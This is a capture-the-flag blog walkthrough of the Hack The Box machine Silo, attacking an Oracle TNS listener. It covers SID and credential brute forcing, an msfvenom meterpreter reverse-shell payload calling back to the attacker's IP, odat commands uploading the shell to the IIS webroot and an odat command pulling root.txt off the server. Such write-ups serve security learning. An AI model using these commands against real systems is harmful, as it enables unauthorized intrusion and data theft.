[hackthebox]Silo

silo1

Introduction

I attempted this retired machine without reading the htb guides, I went through a lot of rabbit holes and eventually found that the oracle tns port 1521 is the entry point.

On testing the silo machine I found that it is susceptible to tns poisoning, searching on the web I found this invaluable article which describes the methodology of attacking Oracle database through its tns port – 1521, the pdf article can be found in https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

I followed oracle metasploit guide and encountered rabbit holes, at first while trying to use the oracle sqli modules I encountered oci8 error which after research I found this, thanks to g0tmi1k’s response in the forum, I then followed the instruction to the dot and got the modules working without error.

All the sqli modules against the silo’s oracle failed to escalate the user to DBA, after research I found that I can use the sqlplus to connect a user as sysdba and further research I found about odat, I use the python3 script instead of the odat in the apt repository (I tried but has error), odat is a powerful script that can execute command, remote file inclusion and data exfiltration on the remote oracle server; in conclusion from user until root can be done through the use of odat.

In all this machine is a good practice on how to do oracle attacks by following the methodology introduced in https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

I am presenting the attack from enumeration, foothold until privilege escalation. Enumeration is very important in this machine, I will only issue attacks when I am sure that there is a vulnerable target.

To make odat working properly

You need to follow the instruction in https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux to the dot, to make the environment variable permanent I suggest you insert the path into your .bashrc.

Installing the files from oracle will allow you to use the metasploit oracle sqli modules, sqlplus client and odat properly.

Do a git clone from https://github.com/quentinhardy/odat and use python3 to run the script, odat is available in kali’s repo, but you will run into error on the kali 2020 version (Linux kali 5.5.0-kali1-amd64 #1 SMP Debian 5.5.13-2kali1 (2020-04-03) x86_64 GNU/Linux)

Enumeration

The majority of the time I used to hack this machine is on enumeration.

nmap scanning took time to finish, while it was scanning ports will be reported, so I was enumerating whenever I saw some ports reported without waiting for the entire nmap scanning process to finish.

My first enumeration was against the web, because tcp 80 was reported first by nmap, so I used tools such as nikto, gobuster and dirbuster, the directories and files enumeration did not give me anything useful.

My next check was towards rpc and smb, but both services were access denied from unauthenticated user.

The next enumeration was interesting after nmap reported tcp/1521 (oracle tns port), my hunch told me that this could be the way to a foothold. This hunch was developed after owned a few HTB windows machines, most of the windows machines have web, dns, wsman, ldap, smb and rpc but silo was my first windows machine which has oracle database port so this abnormality triggers my hunch to investigate oracle port.

nmap

nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82

# Nmap 7.80 scan initiated Thu May  7 13:12:19 2020 as: nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82
Increasing send delay for 10.10.10.82 from 0 to 5 due to 43 out of 107 dropped probes since last increase.
Warning: 10.10.10.82 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.82
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-05-07 13:12:20 +08 for 3875s
Not shown: 63244 closed ports, 2278 filtered ports
Reason: 63244 conn-refused and 2278 no-responses
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 8.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   syn-ack Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49160/tcp open  oracle-tns   syn-ack Oracle TNS listener (requires service name)
49161/tcp open  msrpc        syn-ack Microsoft Windows RPC
49162/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3m13s, deviation: 0s, median: 3m13s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9149/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52707/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38458/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26445/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-07T06:20:02
|_  start_date: 2020-05-07T04:50:06

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  7 14:16:55 2020 -- 1 IP address (1 host up) scanned in 3876.32 seconds

web enumeration

I was using nikto, gobuster and dirbuster at the same time, I was search for directories and files.
the original page is an IIS default page:
silo2

gobuster with this wordlist /usr/share/wordlists/dirb/big.txt gave me two directories /aspnet_client and /aspnet_client/system_web

on dirbuster it gave me three aspx files in /aspnet_client they are "james kim".aspx, "britney spears".aspx and "joe roehm".aspx, these are rabbit holes which gave this:
silo3

Oracle port enumeration

I research from the web about tcp/1521 exploit and found tns poisoning.

A test with the tnspoison_checker module reveals that port 1521 is vulnberable to tns poisoning.
silo4

So what is the technique to exploit the tns poisoning? I found this article which helps me use a systematic way to attack oracle tns port.

In short to attack oracle there are 4 things I need:

  1. IP address of oracle server, which is known
  2. Oracle listening port, which is known.
  3. Username and password of oracle user, which is yet to be found.
  4. the Service Identifier (SID) of oracle, which is yet to be found.

SID bruteforcing

To find the username and password, I need the SID of oracle. I set the rhosts to 10.10.10.82 and verbose to false, in order to suppress failed information and display only success information.
silo5

Brute force username and password with found SID

Follow this guide to the dot if you have oci8lib_270 error.

I use the oracle_login and set rhost to 10.10.10.82 and SID to XE and run the brute force, this process will take a while which may lead you to misunderstand that the brute force is stalled, please wait patiently until the result is displayed.
silo6

The username and password are scott and tiger they are in lower cases.

Foothold

A foothold is found by using odat to perform remote file inclusion, remote command execution and remote file download.

Oracle privilege escalation

All my available sqli modules in metasploit have failed to privilege escalate scott to dba.
After research I found that I can use sqlplus to test if I can elevate scott, and further research I found odat to easily do remote file inclusion, remote command execution and remote download file.

This is the command to test sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba if you can get a sql prompt means escalate to sysdba is anytime.
silo8

Remote file inclusion with odat

dbmsxslprocessor is used for file upload.
To know more about the options python3 ../tools/odat/odat.py dbmsxslprocessor --help, there is a command --putFile which is used to upload my shell code.

To generate a shell aspx file msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.33 lport=1337 -f aspx -o hello.aspx

To upload file with odat use python3 ../tools/odat/odat.py dbmsxslprocessor -s 10.10.10.82 -U scott -P tiger -d XE --putFile "c:\inetpub\wwwroot" "hello.aspx" "/home/cyruslab/htb/silo/hello.aspx" --sysdba

silo9

Set up the multi handler:
silo10

Start the reverse connection:
silo11

Get the user flag

silo12silo13silo14

Get the root flag

odat has made getting the root flag really easy. to execute command and download file use the externaltable, I tried the dbmsxslprocessor to download file but failed.

python3 ../tools/odat/odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --getFile "c:\users\administrator\desktop" "root.txt" "/home/cyruslab/htb/silo/root.txt" --sysdba
silo15

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s